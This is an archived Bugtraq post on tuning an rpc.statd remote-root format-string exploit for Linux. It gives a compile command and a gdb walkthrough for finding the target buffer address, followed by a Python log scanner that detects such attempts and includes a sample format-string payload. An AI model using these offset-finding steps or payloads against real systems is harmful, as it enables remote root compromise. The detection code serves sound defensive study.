Bugtraq mailing list archives

rpc.statd remote root xploit for linux/x86 (little fix)


From: Doing <jdoing () teleline es>
Date: Wed, 2 Aug 2000 15:43:38 +0000

 To compile the xploit you need the librpcsvc library:

gcc statd.c -o statd -lrpcsvc

 Way of finding offsets for your distro/version:

Launch statd and attach it with gdb:

[root@localhost statd]# ./statd
[root@localhost statd]# ps aux | grep st
root       394  0.0  0.9  1184   576  ?  S    15:27   0:00 ./statd
[root@localhost statd]# gdb ./statd
GNU gdb 4.18
[ cut    cut    cut    cut   ]
(gdb) attach 394
Attaching to program:
/zecreto/doing/xploits/daemon/rpc.statd/knfsd-1.3.2/utils/statd/./statd,
process 394

[ Now put a breakpoint on the function log() ]
(gdb) break log
Breakpoint 1 at 0x804a10a: file log.c, line 82.
(gdb) c
Continuing.

[ At this point run the xploit ]
Breakpoint 1, log (level=2, fmt=0x804c820 "SM_MON request for hostname
containing '/': %s") at log.c:82
82          va_start(ap, fmt);

[ And put another breakpoint in the function syslog() ]
(gdb) break syslog
Breakpoint 2 at 0x400d12e6: file syslog.c, line 102.
(gdb) c
Continuing.

Breakpoint 2, syslog (pri=2,
    fmt=0xbfffef38 "SM_MON request for hostname containing '/':
[garbage]..)
         ^^^^^^^^^
           This is the address of the buffer in function log. If you run
the xploit with this value it should work.

 Doing
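The gdb session above shows the client-supplied hostname ending up inside the string that rpc.statd's log() hands to syslog() as its format argument. As an added example that is not part of the original post, here is a defender-side check that scans syslog lines for that SM_MON message and flags hostname fields carrying printf conversion specifiers, non-printable bytes or an oversized value; the sample log lines, the `localhost` host name and the pid are constructed.

```python
import re

# Constructed sample syslog lines (not from the original post). The message
# text "SM_MON request for hostname containing '/'" is the one rpc.statd's
# log() emits, as seen in the gdb session; hostnames and pid are invented.
SAMPLE_LOG = [
    "Aug  2 15:27:01 localhost rpc.statd[394]: SM_MON request for hostname "
    "containing '/': nfs/client.example",
    "Aug  2 15:27:03 localhost rpc.statd[394]: SM_MON request for hostname "
    "containing '/': /\x90\x90\x90%x%x%x%n",
    "Aug  2 15:27:05 localhost rpc.statd[394]: Version 1.3.2 Starting",
    "Aug  2 15:27:07 localhost rpc.statd[394]: SM_MON request for hostname "
    "containing '/': /" + "A" * 600,
]

# Matches the statd log message and captures the client-controlled field.
SM_MON_RE = re.compile(
    r"rpc\.statd\[(?P<pid>\d+)\]: SM_MON request for hostname "
    r"containing '/': (?P<host>.*)$"
)
# printf-style conversion: %, optional flags/width/precision/length, conversion.
FMT_SPEC_RE = re.compile(
    r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|l|ll|L|q|j|z|t)?[diouxXeEfFgGaAcspn]"
)
MAX_SANE_HOSTNAME = 255  # a full DNS name never legitimately exceeds this


def suspicious_reasons(hostname):
    """Explain why a hostname field looks like injected data, if it does."""
    reasons = []
    if FMT_SPEC_RE.search(hostname):
        reasons.append("format-specifier")  # would be consumed by syslog()
    if any(ord(c) < 0x20 or ord(c) > 0x7E for c in hostname):
        reasons.append("non-printable")  # raw bytes, not a DNS label
    if len(hostname) > MAX_SANE_HOSTNAME:
        reasons.append("oversized")
    return reasons


def scan_statd_log(lines):
    """Return (line_no, pid, reasons) for each suspicious SM_MON message."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = SM_MON_RE.search(line)
        if not m:
            continue
        reasons = suspicious_reasons(m.group("host"))
        if reasons:
            hits.append((n, int(m.group("pid")), reasons))
    return hits


if __name__ == "__main__":
    for line_no, pid, reasons in scan_statd_log(SAMPLE_LOG):
        print(f"line {line_no}: rpc.statd[{pid}] suspicious: {', '.join(reasons)}")
```

A benign hostname that merely contains a slash, as in the first sample line, is still logged by statd but produces no alert, so the check keys on the content of the field rather than on the message itself.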

